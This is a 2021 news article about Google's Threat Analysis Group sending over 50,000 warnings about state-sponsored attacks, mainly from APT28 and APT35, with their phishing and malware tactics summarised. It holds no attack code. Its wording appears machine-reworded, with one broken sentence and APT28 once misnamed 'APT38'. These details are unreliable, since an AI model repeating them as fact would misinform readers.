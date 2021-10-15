



Google has revealed that it has sent customers about 50,000 alerts about state-sponsored phishing or hacking attempts since January.

Google announced in 2021 that it sent customers approximately 50,000 alerts regarding state-sponsored phishing or hacking attempts. The data was provided by Google’s Threat Analysis Group (TAG). This group is tracking government-sponsored hacking campaigns. The number of alerts compared to the previous year.

“So far, more than 50,000 warnings have been sent in 2021, an increase of nearly 33% from this time in 2020. This surge is primarily due to anomalies by Russian actors known as APT28 or Fancy Bear. It’s because we blocked a large campaign, “written by Ajax Bash, Google security engineer at TAG.

Google TAG sends a batch of alerts to all users who may be exposed to attacks from nation-state attackers. The group avoids providing real-time alerts that allow threat attackers to determine defense strategies implemented by IT giants.

The most important campaigns for Google users were coordinated by the Russia-linked APT28 group (also known as Fancy Bear) and the Iran-linked APT35 (also known as Charming Kitten) group.

The APT28 Group (also known as Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) has been active since at least 2007 and targets government, military, and security organizations around the world. The group was also involved in a series of attacks targeting the 2016 presidential election.

This group operates from the military unity 26165 of the General Staff of the Armed Forces of Russia (GRU) 85th Special Service Center (GTsSS).

Most of the APT28 campaigns used spear phishing and malware-based attacks.

This particular campaign accounted for 86% of the series of alerts the Google team sent this month.

Google states that it has blocked almost all spear phishing messages sent by the APT38 group to Gmail customers.

Google researchers have also warned of intense activity related to this year’s APT35 group. Nation-state groups were behind malware-based attacks, account hijackings, and cyber-spy campaigns aimed at gathering information from the Tehran government. In early 2021, the APT35 Group compromised sites affiliated with UK universities to deploy phishing kits to targetGmail, Hotmail, and Yahoo users.

The attacker also used a malicious app disguised as legitimate VPN software available on the Google Play store and third-party platforms to deliver malware between May 2020 and July 2021.

The APT35 group linked to Iran also used conference-themed phishing emails to target Gmail users, and used Munich Security and the Think-20 (T20) Italy conference as a temptation. The group has also started using Telegram to notify operators. Nation-state actors embed Javascript in phishing pages that notify them when the page loads.

Google shared indicators related to hacking activities conducted by two state-sponsored hacker groups.

Pierluigi Paganini

